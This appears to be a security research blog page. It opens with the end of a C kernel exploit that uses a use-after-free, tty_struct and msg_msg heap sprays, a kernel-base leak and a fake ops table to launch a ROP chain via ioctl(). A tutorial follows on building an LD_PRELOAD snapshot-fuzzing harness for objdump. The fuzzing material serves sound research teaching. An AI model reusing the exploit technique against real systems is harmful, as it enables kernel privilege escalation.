        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/ 

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;
    }

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;
    }

    // I think the pointers should be different as well
    if (next == prev) {
        return false;
    }

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    
    return true;
}

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with our fake table address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");
    save_state();

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open(DEV, O_RDWR);
    close(fd1);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        close(open_ptmx[i]);
        open_ptmx[i] = 0;
    }
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");
    solve_gadgets();

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);
    close(fd3);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        init_msg_q();
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();
        }

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
            break;
        }
        
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    }
    
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);
    close(fd5);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    overwrite_ops(fd6);
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
    }

    return 0;
}

Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

2022-04-02T00:00:00+00:00

Introduction

It’s been a while since I’ve done one of these, and one of my goals this year is to do more, so here we are. A side project of mine is kind of reaching a good stopping point, so I’ll have more free time to do my own research and blog again. Looking forward to sharing more and more this year.

One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, or as some would call it, in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase; an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.

However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even for production binaries for which we have source but which have gone through the sausage factory of enterprise build systems.

So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

Target (Easy Mode)

For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

Hello World

The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you, running a different objdump than you. But the point of the blogpost is just to show concepts so that you can get creative on your own.

I also noticed that the program doesn’t close our input file until the end of execution:

read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++

This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.
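As a rough illustration of what “emulating an input file” means, here is a minimal sketch of a read()-style routine that serves bytes from a memory buffer while tracking a cursor, so that repeated reads behave like reads on a real file descriptor. The struct mem_file type and the mem_read() function are hypothetical names for this sketch and are not the hooks this post ends up with.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

/* Hypothetical in-memory "file": a buffer, its length, and a read cursor */
struct mem_file {
    const unsigned char *data;
    size_t len;
    size_t pos;   /* invariant: pos <= len */
};

/* Behaves like read(): copies up to count bytes from the cursor, advances
 * the cursor, and returns the number of bytes copied (0 at end of file) */
static ssize_t mem_read(struct mem_file *f, void *buf, size_t count) {
    size_t remaining = f->len - f->pos;
    if (count > remaining) {
        count = remaining;
    }

    memcpy(buf, f->data + f->pos, count);
    f->pos += count;
    return (ssize_t)count;
}
```

The short read near the end of the buffer and the 0 return at end of file are the two behaviors a caller like objdump relies on when it reads a file in 4096-byte chunks.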

Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information. For starters, let’s just get a Hello, World! shared object loaded.

We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

So our code so far will look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
**> LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64


Disassembly of section .interp:

0000000000000238 <.interp>:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 <_init@@Base-0x34e3>
 248:   78 38                   js     282 <_init@@Base-0x34d6>
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:

It works, now we can start looking for functions to hook.

Looking for Hooks

The first thing we need to do is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. From our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I’m going to assume stat() since we aren’t dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to test to see if we hit it and check if it’s being called for our target input file (now changed to fuzzme).

In order to create a hook, we will follow a pattern where we define a pointer type for the real function via a typedef and then initialize a pointer of that type to NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RTLD_NEXT, <symbol name>) to get its location and change the pointer value to the real symbol address. (This will be more clear later on).

Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
stat_t real_stat = NULL;

// Hook function, objdump will call this stat instead of the real one
int stat(const char *restrict path, struct stat *restrict buf) {
    printf("** stat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

However, if we compile and run that, we don’t ever print and exit, so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have 64 variants, such as open() and open64(), that are used somewhat interchangeably depending on configurations and flags. I tried hooking a stat64() but still had no luck with the hook being reached.

Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    printf("** Hit our __xstat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    // Print the filename requested
    printf("** __xstat() hook called for filename: '%s'\n", __filename);

    // Resolve the address of the real __xstat() on demand and only once
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Call the real __xstat() for the caller so everything keeps going
    return real_xstat(__ver, __filename, __stat_buf);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Ok so now when we run this, and we check for our print statements, things get a little spicy.

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'

So now we can have some fun.

__xstat() Hook

So the purpose of this hook will be to lie to objdump and make it think it successfully stat()’d the input file. Remember, we’re making a snapshot fuzzing harness, so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accommodate that.

My idea at this point was to create a somewhat “legit” stat struct that would normally be returned for our actual file fuzzme which is just a copy of /bin/ls. We can store this stat struct globally and only update the size field as each new fuzz case comes through. So the timeline of our snapshot fuzzing workflow would look something like:

1. Our constructor function is called when our shared object is loaded
2. Our constructor sets up a global “legit” stat struct that we can update for each fuzzcase and pass back to callers of __xstat() trying to stat() our fuzzing target
3. The imaginary fuzzer runs objdump to the snapshot location
4. Our __xstat() hook updates the global “legit” stat struct size field and copies the stat struct into the caller’s buffer
5. The imaginary fuzzer restores the state of objdump to its state at snapshot time
6. The imaginary fuzzer copies a new input into the harness and updates the input size
7. Our __xstat() hook is called once again, and we repeat step 4; this process occurs over and over forever.

So we’re imagining the fuzzer has some routine like this in pseudocode, even though it’d likely be cross-process and require process_vm_writev:

insert_fuzzcase(config.input_location, config.input_size_location, input, input_size) {
  memcpy(config.input_location, input, input_size);
  memcpy(config.input_size_location, &input_size, sizeof(size_t));
}
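As a rough, in-process version of that routine, here is a minimal sketch in C. The struct fuzz_config type and its field layout are my own assumptions for illustration, and a real cross-process fuzzer would swap the memcpy() for something like process_vm_writev. The one thing it adds over the pseudocode is a bounds check against the max input size.

```c
#include <stddef.h>
#include <string.h>

#define MAX_INPUT_SZ (1024 * 1024)

// Hypothetical fuzzer-side config: where the harness keeps the input bytes
// and the input length (fixed addresses inside the target in this post)
struct fuzz_config {
    unsigned char *input_location;
    size_t *input_size_location;
};

// Copy one fuzzcase into the harness-owned buffers.
// Returns 0 on success, -1 if the input would not fit.
int insert_fuzzcase(const struct fuzz_config *config,
                    const unsigned char *input, size_t input_size) {
    if (input_size > MAX_INPUT_SZ) {
        return -1;
    }

    // `input` already points at the bytes, so it is passed without '&'
    memcpy(config->input_location, input, input_size);
    *config->input_size_location = input_size;
    return 0;
}
```

Rejecting oversized inputs on the fuzzer side means the harness never has to worry about a fuzzcase spilling past the end of the mapped input region.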

One important thing to keep in mind is that if the snapshot fuzzer is restoring objdump to its snapshot state every fuzzing iteration, we must be careful not to depend on any global mutable memory. The global stat struct will be safe since it will be instantiated during the constructor; however, its size field will be restored to its original value each fuzzing iteration by the fuzzer’s snapshot restore routine.

We will also need a global, recognizable address to store variable mutable global data like the current input’s size. Several snapshot fuzzers have the flexibility to ignore contiguous ranges of memory for restoration purposes. So if we’re able to create some contiguous buffers in memory at recognizable addresses, we can have our imaginary fuzzer ignore those ranges for snapshot restorations. So we need to have a place to store the inputs, as well as information about their size. We would then somehow tell the fuzzer about these locations and when it generated a new input, it would copy it into the input location and then update the current input size information.
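To make the restore behavior concrete, here is a toy model in C. It is only a sketch: a real snapshot fuzzer works on dirty pages of a whole process, and the struct snapshot type and function names below are invented for illustration. It shows a byte outside the excluded range being rolled back while a byte inside the excluded range survives the restore.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

// Toy model of process memory: one flat buffer plus a saved copy of it
struct snapshot {
    unsigned char *live;   // memory the target mutates while running
    unsigned char *saved;  // copy taken at snapshot time
    size_t len;
    size_t skip_start;     // [skip_start, skip_end) is left alone on restore
    size_t skip_end;
};

// Take a snapshot of `live`. Returns 0 on success, -1 on bad range or OOM.
int snapshot_take(struct snapshot *s, unsigned char *live, size_t len,
                  size_t skip_start, size_t skip_end) {
    if (skip_start > skip_end || skip_end > len) return -1;
    s->saved = malloc(len);
    if (!s->saved) return -1;
    memcpy(s->saved, live, len);
    s->live = live;
    s->len = len;
    s->skip_start = skip_start;
    s->skip_end = skip_end;
    return 0;
}

// Restore everything except the excluded range
void snapshot_restore(struct snapshot *s) {
    memcpy(s->live, s->saved, s->skip_start);
    memcpy(s->live + s->skip_end, s->saved + s->skip_end,
           s->len - s->skip_end);
}

// Returns 1 if the excluded byte survived a restore and the other did not
int snapshot_demo(void) {
    unsigned char mem[8] = {0};
    struct snapshot s;
    if (snapshot_take(&s, mem, sizeof(mem), 4, 8) != 0) return 0;

    mem[0] = 0xAA;  // stands in for st.st_size patched inside a hook
    mem[4] = 0xBB;  // stands in for the input size written by the fuzzer

    snapshot_restore(&s);
    free(s.saved);
    return mem[0] == 0x00 && mem[4] == 0xBB;
}
```

In this model the first four bytes play the role of ordinary globals like the stat struct, and the last four play the role of the input and input-size regions the fuzzer is told to leave alone.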

So now our constructor has an additional job: set up the input location as well as the input size information. We can do this easily with a call to mmap(), which will allow us to specify the address we want our mapping placed at with the MAP_FIXED flag. We’ll also create a MAX_INPUT_SZ definition so that we know how much memory to map from the input location.

By itself, the function that maps memory for the inputs and their size information looks like this. Notice that we use MAP_FIXED and we check the returned address from mmap() just to make sure the call didn’t succeed but map our memory at a different location:

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

mmap() will actually map multiples of whatever the page size is on your system (typically 4096 bytes). So, when we ask for sizeof(size_t) bytes for the mapping, mmap() is like: “Hmm, that’s just a page dude” and gives us back a whole page from 0x1336000 - 0x1337000 not inclusive on the high-end.
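If you want to see how much memory a given request really occupies, a small helper like the one below does the rounding. This is a sketch under the assumption that sysconf(_SC_PAGESIZE) reports the page size; round_up_to_page is a name I made up, and the 4096 fallback is just a guess for the unlikely case that the query fails.

```c
#include <stddef.h>
#include <unistd.h>

// Round len up to the next multiple of the system page size
size_t round_up_to_page(size_t len) {
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) {
        page = 4096;  // fallback assumption if the query fails
    }
    size_t p = (size_t)page;
    return (len + p - 1) / p * p;
}
```

With 4096-byte pages, round_up_to_page(sizeof(size_t)) comes out to one full page, which is why the size mapping at 0x1336000 ends exactly where the input mapping at 0x1337000 begins.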

Random sidenote: be careful about arithmetic in definitions and macros as I’ve done here with MAX_INPUT_SZ. It’s very easy for the pre-processor to substitute your text for the definition keyword and ruin some order of operations or even overflow a specific primitive type like int.
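Here is a small illustration of both pitfalls. The macro and function names are made up for the example; the point is only what the pre-processor does with the unparenthesized text.

```c
#define BAD_MAX_INPUT_SZ   1024 * 1024      // no parentheses
#define GOOD_MAX_INPUT_SZ  (1024 * 1024)    // parenthesized

// How many max-size inputs fit in 4 MiB?
// Expands to (4 * 1024 * 1024) / 1024 * 1024, i.e. 4096 * 1024 = 4194304
int chunks_bad(void)  { return (4 * 1024 * 1024) / BAD_MAX_INPUT_SZ; }

// Expands to (4 * 1024 * 1024) / (1024 * 1024) = 4
int chunks_good(void) { return (4 * 1024 * 1024) / GOOD_MAX_INPUT_SZ; }

// Writing 4 * 1024 * 1024 * 1024 with plain int literals would overflow a
// 32-bit int, so force a wider type on the first operand instead
#define FOUR_GIB (4ULL * 1024 * 1024 * 1024)

unsigned long long four_gib(void) { return FOUR_GIB; }
```

Wrapping the whole expression in parentheses and giving the first literal an explicit wide type covers both problems.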

Now that we have memory set up for the fuzzer to store inputs and information about the input’s size, we can create that global stat struct. But we actually have a big problem. How can we call into __xstat() to get our “legit” stat struct if we have __xstat() hooked? We would hit our own hook. To circumvent this, we can call __xstat() with a special __ver argument that tells the hook it was called from our constructor. The variable is an int, so let’s go with 0x1337 as the special value. That way, in our hook, if we check __ver and it’s 0x1337, we know we are being called from the constructor and we can actually stat our real file and create a global “legit” stat struct. When I dumped a normal call by objdump to __xstat(), __ver was always 1, so we will patch it back to that inside our hook. Now our entire shared object source file should look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// Our "legit" global stat struct
struct stat st;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (NULL == real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();    
}

Now if we run this, we get the following output:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file

This is cool, this means that the objdump devs did something right and their stat() would say: “Hey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!

So we have identified a problem: we need to simulate the fuzzer placing a real input into memory. To do that, I’m going to start using #ifdef to define whether or not we’re testing our shared object. Basically, if we compile the shared object and define TEST, our shared object will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing, and we can see if our harness is working appropriately. So if we define TEST, we will copy the /bin/ed bytes into the input buffer and update the input size, which our hooks then use to patch the size member of the global “legit” stat struct.

You can compile the shared object now to perform the test as follows:

gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl

We also need to set up our global “legit” stat struct, the code to do that should look as follows. Remember, we pass a fake __ver variable to let the __xstat() hook know that it’s us in the constructor routine, which allows the hook to behave well and give us the stat struct we need:

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    // Create a global stat struct for our file in case someone asks, this way
    // when someone calls stat() or fstat() on our target, we can just return the
    // slightly altered (new size) stat struct &skip the kernel, save syscalls
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("Error creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

All in all, our entire harness looks like this now:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

